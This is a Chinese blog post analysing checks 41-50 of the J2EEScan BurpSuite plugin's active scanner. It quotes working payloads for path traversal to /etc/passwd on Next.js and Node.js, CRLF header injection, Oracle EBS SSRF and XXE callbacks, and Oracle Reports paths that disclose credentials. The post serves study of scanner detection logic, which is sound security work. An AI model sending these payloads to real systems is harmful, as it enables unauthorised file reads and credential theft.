【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(41-50)

已于 2022-09-19 00:54:40 修改
阅读量267 收藏 1
点赞数
分类专栏: BurpSuite插件 文章标签: java-ee 学习 java
于 2022-09-15 23:44:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/126831754
版权

【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(41-50)

前言

插件开发学习第10套。前置文章:

【BurpSuite】插件开发学习之Log4shell
【BurpSuite】插件开发学习之Software Vulnerability Scanner
【BurpSuite】插件开发学习之dotnet-Beautifier
【BurpSuite】插件开发学习之active-scan-plus-plus
【BurpSuite】插件开发学习之J2EEScan(上)-被动扫描
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(1-10)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(11-20)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(21-30)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(31-40)

分析

【41】NextFrameworkPathTraversal

payload

    private static final String NEXT_TRAVERSAL = "/_next/../../../../../../../../../etc/passwd";

nextjs的任意文件读取
_
修复的话对传入的path做了判断
在这里插入图片描述

【42】NodeJSPathTraversal nodejs路径穿越

payload

    private static final String NODEJS_TRAVERSAL = "../../../j/../../../../etc/passwd";

修复mr:https://github.com/nodejs/node/commit/b98e8d995efb426bbdee56ce503017bdcbbc6332

【43】NodeJSRedirect

payload

    private static final String NODEJS_PATH = "///www.example.com/%2e%2e";

路由问题导致的URL跳转
match是否location即可

 if (nodejsInfo.getStatusCode() == 301
                        || nodejsInfo.getStatusCode() == 302
                        || nodejsInfo.getStatusCode() == 303) {

                    String locationHeader = HTTPParser.getResponseHeaderValue(nodejsInfo, "Location");

                    if (locationHeader != null && locationHeader.startsWith("/www.example.com")) {

【44】NodeJSResponseSplitting CVE-2016-2216

响应拆分漏洞
payload

    private static final byte[] NODEJS_INJ = "%c4%8d%c4%8aInjectionHeader:%2020%c4%8d%c4%8a".getBytes();

match是从返回包头找有没有插进去
在这里插入图片描述
在这里插入图片描述

【45】OASConfigFilesDisclosure

path

private static final List<String> OAS_PATHS = Arrays.asList(
            "/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml",
            "/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml",
            "/xsql/lib/XSQLConfig.xml",
            "/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml",
            "/globals.jsa",
            "/demo/ojspext/events/globals.jsa",
            // Dynamic Monitoring Services 
            "/dms/AggreSpy",
            "/soap/servlet/Spy",
            "/servlet/Spy",
            "/servlet/DMSDump",
            "/dms/DMSDump",
            // Oracle Java Process Manager 
            "/oprocmgr-status",
            "/oprocmgr-service",
            "/soap/servlet/soaprouter",
            "/fcgi-bin/echo",
            "/fcgi-bin/echo2",
            "/fcgi-bin/echo.exe",
            "/fcgi-bin/echo2.exe",
            // BC4J Runtime Parameters            
            "/webapp/wm/runtime.jsp"
            
            //TODO CVE-2002-0565
//            "/_pages/_webapp/_admin/_showpooldetails.java",
//            "/_pages/_webapp/_admin/_showjavartdetails.java",
//            "/_pages/_webapp/_jsp/",
//            "/_pages/_demo/",
//            "/_pages/_demo/_sql/_pages/",
//            "/OA_HTML/AppsLocalLogin.jsp"
    );

返回包match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "SOAP configuration file".getBytes(),
            "On a PRODUCTION system".getBytes(),
            "<%".getBytes(),
            "<DMSDUMP version".getBytes(),
            "DMS Metrics".getBytes(),
            "Current Metric Values".getBytes(),
            "Process Status".getBytes(),
            "SOAP Server".getBytes(),
            "DOCUMENT_ROOT=".getBytes(),
            "BC4J Runtime Parameters".getBytes()
    );

02年的洞
可以理解为oracle一些敏感文件的泄露,感觉现在应该不太可能有了,20年了。

【46】OASSqlnetLogDisclosure

path

private static final List<String> SQLNETLOG_PATHS = Arrays.asList(
            "/sqlnet.log"
    );

match

private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "VERSION INFORMATION".getBytes()
    );

sql的一写日志泄露。

【47】OracleCGIPrintEnv

path

private static final List<String> CGIENV_PATHS = Arrays.asList(
            "/cgi-bin/printenv"
    );

match

 private static final byte[] GREP_STRINGS = "DOCUMENT_ROOT".getBytes();

同样的是敏感信息泄露。

【48】OracleEBSSSRF - CVE-2017-10246

payload

        String Oracle_SSRF_Help = String.format("/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://%s:80/", currentCollaboratorPayload);

是个前台的洞

【49】OracleEBSSSRFLCMServiceController - CVE-2018-3167

payload

        String oracleSSRFDoctypePayload = String.format("<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://%s:80\">", currentCollaboratorPayload);

是一个XXE 漏洞,可以打SSRF

【50】OracleReportService

path

    private static final List<String> ORACLE_REPORT_SERVICE_PATHS = Arrays.asList(
            "/reports/rwservlet/getserverinfo",
            "/reports/rwservlet/showenv",
            "/reports/rwservlet/showjobs",
            "/reports/rwservlet/showmap"
    );

match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "Successful Jobs".getBytes(),
            "Servlet Environment Variables".getBytes(),
            "Reports Server Queue Status".getBytes(),
            "Reports Servlet Key Map".getBytes()
    );

这里面的路径都是敏感信息泄露。
其中

                                if (ORACLE_REPORT_SERVICE_PATH.equalsIgnoreCase("/reports/rwservlet/showmap")) {

格外关键,将rsp保存下来单独分析。
按行读取

String[] lines = helpers.bytesToString(showMapPage).split("\n")

找到行中包含

OraInstructionText

并进行match

    private static final Pattern REPORT_SERVICE_KEY_PATTERN = Pattern.compile("OraInstructionText>([^<]+)<");

如果通过上面正则,没有找到了如下的key

private static final List<String> KEYMAPS_TO_IGNORE = Arrays.asList(
            "%ENV_NAME%",
            "barcodepaper",
            "barcodeweb",
            "breakbparam",
            "charthyperlink_ias",
            "charthyperlink_ids",
            "distributionpaper",
            "express",
            "orqa",
            "parmformjsp",
            "pdfenhancements",
            "report_defaultid",
            "report_secure",
            "run",
            "runp",
            "tutorial",
            "xmldata"
    );

则把匹配到的key拼接,然后发起请求

        String RWSERVLET_PARSEQUERY_URL = "/reports/rwservlet/parsequery?";
                        URL urlToTest = new URL(protocol, url.getHost(), url.getPort(), RWSERVLET_PARSEQUERY_URL + key);

预期是请求得到username 和pwd

    private static final Pattern PWD_DISCLOSURE_PATTERN = Pattern.compile("userid=([^/]+)/([^@]+)@([^ \\t]+)([ \\t]|$)");

预期的rsp
在这里插入图片描述
05年的洞,估计也基本没有了。

_HWHXY
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BurpSuite插件开发学习J2EEScan(下)-主动扫描(1-10)
HWHXY的博客
09-02 634
插件开发学习第6套。上一章讲的是重写了doPassiveScan,这里讲重写doActiveScan。
BurpSuite插件开发学习J2EEScan(下)-主动扫描(31-40)
HWHXY的博客
09-13 318
插件开发学习第8套。继续上一章的分析。
BurpSuite插件开发学习J2EEScan(下)-主动扫描(21-30)
HWHXY的博客
09-08 367
插件开发学习第8套。继续上一章的分析。
BurpSuite插件开发学习J2EEScan(下)-主动扫描(61-76)
HWHXY的博客
09-19 363
插件开发学习第11套。
BurpSuite插件开发学习J2EEScan(下)-主动扫描(11-20)
HWHXY的博客
09-03 626
插件开发学习第7套。继续上一章的分析。
Burpsuite-UAScan:burpsuite插件:被动进行未授权访问扫描
05-23
Burpsuite插件:被动方式进行未授权访问漏洞(越权)的扫描 被动扫描经过Burpsuite的每一个请求 通过修改Cookie头重新访问判断是否存在未授权访问(越权)问题 如果扫描到未授权访问的URL会显示到空白区域中 采用...
Burpsuite-JSScan:burpsuite插件主动和被动进行JS扫描并分析其中的可利用点
05-23
burpsuite插件主动和被动进行JS扫描 目前实现了主动扫描和被动扫描 主动扫描模块使用了珍藏字典 被动扫描模块将会分析每一个经过burpsuite的请求,如果是js文件就会记录 排除常见的JS库,只分析自定义JS,有效发现...
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效,非常好用老版的BurpSuite和新版的都可以使用。祝大家挖洞顺利(工具仅用于学习交流)
burp插件-J2EEScan-1.2.5
05-30
编译好的burp插件J2EEScan-1.2.5,包含依赖库,可直接导入burp使用
burpsuite分块传输插件chunked-coding-converter.0.2.1.jar
01-25
burpsuite分块传输插件,一键生成分块传输请求,用于bypass waf等
BurpSuite插件开发学习J2EEScan(上)-被动扫描
HWHXY的博客
08-30 785
插件开发学习第5套。
report builder REP-51002 bind err
12-03 434
解决方法:Results from OTN :You should test first with a "standalone" reports server :1. Stop the OC4J2. Start the namingservice3. Start the reports server : rwserver server=test_srv 4. tes
(iAS10g)Howtousereports/rwservlettogetreportserverinformation
zgqtxwd的专栏
04-27 322
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
WebLogic反序列化漏洞CVE-2018-2628漏洞检测与利用
a1b2c3是弱口令
12-08 5148
Oracle官方发布了4月份的关键补丁更新CPU(Critical Patch Update),其中包含Weblogic反序列化漏洞可导致远程代码执行漏洞,漏洞威胁等级为高危,对应的CVE编号为CVE-2018-26 影响版本 Oracle WebLogic Server10.3.6.0 Oracle WebLogic Server12.2.1.2 Oracle WebLogic Serv...
利用Vulnhub复现漏洞 - Electron 远程命令执行漏洞(CVE-2018-1000006)
JiangBuLiu的博客
07-03 1491
Electron 远程命令执行漏洞(CVE-2018-1000006)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/electron/CVE-2018-1000006/README.zh-cn.md 漏洞原理 Electron是由Github开发,用HTML,CSS和...
Postgresql的CVE漏洞对应的patch信息(不全)
weixin_38312031的博客
07-04 1787
Postgresql的CVE漏洞对应的patch信息(不全) 第二列:CVE信息 第三列:对应的修复和BUG信息 第四列:patch的github序列号 id:1 https://access.redhat.com/security/cve/CVE-2018-1053 https://bugzilla.redhat.com/show_bug.cgi?id=15396...
oracle Reports Builder安装
weixin_39568073的博客
02-23 1401
安装数据库 安装sqldeveloper 解压后运行 复制一份到\sqldeveloper\bin 安装jdk-7u80 安装wls1036_generic,就是weblogic 进入java的bin目录下,运行它 C:\Program Files\Java\jdk1.7.0_80\bin cd C:\Program Files\Java\jdk1.7...
创建Reports服务器实例
weixin_39568073的博客
02-02 215
connect(‘weblogic’,‘weblogic123’,‘localhost:7001’) createReportsServerInstance(instanceName=‘rep_server1’,machine=‘AdminServerMachine’) D:\Oracle\Middleware\Oracle_Home\user_projects\domains\lh_domain\config\fmwconfig\components\ReportsServerComponent D
WebService soap报文请求返回xml格式以及自定义soap模板
热门推荐
罗伯特是疯子丶
07-22 1万+
需求 上篇文章主要讲了一个springboot集成webservice的例子,这次我们根据已经做好的webservice服务端,做一个soap接口请求,要求请求以soap报文方式请求,返回值为xml格式 这是上篇:springboot集成webservice以及遇到的问题 soap请求接口实现 这是请求报文以及响应的报文的信息 soap接口所需要的参数信息: ...
burpsuite插件
最新发布
07-27
6. J2EEScan:用于检测和利用Java EE应用程序中的漏洞的插件。 7. Retire.js:用于检测应用程序中使用的旧版本JavaScript库和框架的插件。 这只是一小部分Burp Suite插件,还有很多其他插件可以根据您的需求进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值